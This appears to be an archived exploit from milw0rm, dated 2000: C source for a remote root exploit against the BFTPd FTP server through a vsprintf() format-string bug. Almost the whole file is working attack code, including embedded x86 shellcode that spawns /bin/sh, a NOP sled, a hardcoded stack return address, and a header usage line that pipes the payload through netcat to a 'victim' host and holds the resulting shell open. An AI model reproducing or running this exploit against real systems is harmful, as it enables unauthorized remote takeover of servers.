BFTPd - 'vsprintf()' Format Strings

/*
 *  Copyright (c) 2000 - Security.is
 *
 *  The following material may be freely redistributed, provided
 *  that the code or the disclaimer have not been partly removed,
 *  altered or modified in any way. The material is the property
 *  of security.is. You are allowed to adopt the represented code
 *  in your programs, given that you give credits where it's due.
 *
 *  A no-name ftp-server has a serious bug which leads to remote root.
 *  Anyway, we exploit vsprintf() via format-string.
 *
 *  Discovered/coded by: DiGiT - [email protected]
 *  Greets: security.is, ADM
 *  note: Coded during security.is weekend ;>
 *
 *  Run like: (./bftpexp ; cat) | nc bftpd.victim.com 21
 *  offset is optional and is arg1
 * 
 */

#include <stdio.h>

char shellcode[] =
  "\x31\xc0\x31\xdb\x04\x0b\xcd\x80\x31\xc0\x40\x40\xcd\x80\x85"
  "\xc0\x75\x28\x89\xd9\x31\xc0\x41\x04\x3f\xcd\x80\x31\xc0\x04"
  "\x3f\x41\xeb\x1f\x31\xc0\x5f\x89\x7f\x08\x88\x47\x07\x89\x47"
  "\x0c\x89\xfb\x8d\x4f\x08\x8d\x57\x0c\x04\x0b\xcd\x80\x31\xc0"
  "\x31\xdb\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define ADDR 0xbffff83c

int main(int argc, char *argv[]) 
{
  char lenbuf[1024],nopbuf[256], addrbuf[32], buf[256];
  int offset=0,length, nopcount=100,i;
  long nop_addr = ADDR;

  if(argc > 1)
    offset = atoi(argv[1]);

  memset (nopbuf, '\x90', nopcount);
  nop_addr = nop_addr + offset;

  strcpy(buf, nopbuf);
  strcat(buf, shellcode);

  length=1024-strlen(shellcode)-nopcount+4-14;

  strcat(buf, "%.");
  sprintf(lenbuf, "%dd", length);
  strcat(buf, lenbuf);

  sprintf(addrbuf, "%c%c%c%c",
    (unsigned char) ((nop_addr >>  0) & 0xff),
    (unsigned char) ((nop_addr >>  8) & 0xff),
    (unsigned char) ((nop_addr >> 16) & 0xff),
    (unsigned char) ((nop_addr >> 24) & 0xff));

  for(i = 0 ; i < 4 ; i++) 
    strcat(buf, addrbuf);

  fprintf(stderr, "Bftpd remote exploit, by DiGiT\n");
  fprintf(stderr, "Using Address = 0x%x\n", nop_addr);
  printf("%s\n", buf);

  return 0;
}


// milw0rm.com [2000-11-29]